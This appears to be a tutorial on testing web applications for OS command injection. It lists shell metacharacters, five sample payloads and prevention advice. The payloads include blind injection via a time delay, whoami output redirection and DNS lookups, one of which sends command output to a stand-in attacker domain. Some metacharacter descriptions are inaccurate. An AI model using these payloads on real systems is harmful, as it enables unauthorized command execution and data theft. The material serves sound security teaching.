Testing For OS Command Injection
OS Command Injection is a critical class of vulnerability. It allows an attacker to remotely execute code or command on a vulnerable server, which often leads to complete compromise of the server.
OS Command injection is most often used to execute unauthorized OS code or commands in the operating system (OS) to target the system (usually a web server) and degrade its performance. These attacks exist when the applications fail to properly validate and sanitize the parameters that they use when invoking shell functions (system() or exec()) for executing system commands. Attackers who can control these parameters can trick the application and execute any system command of their choice.
Impact of OS Command Injection:
- The attacker can alter or corrupt the database, steal the customer’s records, or, in some cases, launch a Distributed Denial of Service (DDoS) attack.
- An attacker’s gaining access to a shell terminal can lead to the disclosure of files not normally reachable from the missed web and privilege escalation attacks against the server.
- An attacker can leverage an OS command injection vulnerability to compromise other parts of the hosting infrastructure, exploiting trust relationships to pivot the attack to other systems within the organization.
How to Find Command Injection:
Any endpoint of a web application that allows the user to enter any input value to be processed by a backend server can be a valid start point for finding any sort of injection point.
Useful commands to test for Command Injection:
Different ways of injecting OS Commands:
- ; The semicolon is the most common metacharacter used to test an injection flaw. The shell will run all the commands in sequence separated by the semicolon.
- & Separate multiple commands on one command line. It runs the first command then the second command.
- && Runs the command following && only if the preceding command is successful.
- | The Pipe, pipes the output of the first command into the second command.
- || Redirects the standard outputs of the first command to the standard input of the second command.
- ‘ The quote is used to force the shell to interpret and run commands between backticks. Following is an example of this command: Variable=”OS version ‘uname -a’” && echo $variable.
- () The brackets are used to nest commands.
- # The Hash is used as a command-line comment.
Testing for OS Command Injections:
There are many instances of OS command injection.
Variant 1: Simple Case
Payload: |uname -a
Description: This command will print basic system information.
Variant 2: Blind OS command injection using time delays:
Payload: ||ping+-c+20 127.0.0.1||
Description: This command will cause the application to ping its loopback network adapter for 20 seconds.
Variant 3: Blind OS command injection by redirecting output:
Payload: ||whoami>/var/www/images/output.txt||
Description: If the application serves static resources from the file system location /var/www/images/, then we can submit the following payload:
||whoami>/var/www/images/output.txt||
The > character sends the output from the whoami command in the specified file. You can then use the application to fetch output.txt to retrieve the file and view the output from the injected command.
Variant 4: Blind OS command injection using out-of-band techniques:
Payload: ||nslookup+webattacker.com||
Description: The payload uses the nslookup command to cause a DNS lookup for the specified domain.
Variant 5: Blind OS command injection with out-of-band data exfiltration
Payload: ||nslookup+`whoami`.webattacker.com||
Description: The above payload will cause a DNS lookup to the attacker’s domain containing the result of the whoami command:
Prevention:
The most effective way to prevent OS command injection vulnerabilities is to never call out OS commands from application-layer code.
If it is considered unavoidable to call out to OS commands with user-supplied input, then strong input validation must be performed. Also never attempt to sanitize input by escaping shell metacharacters.
References: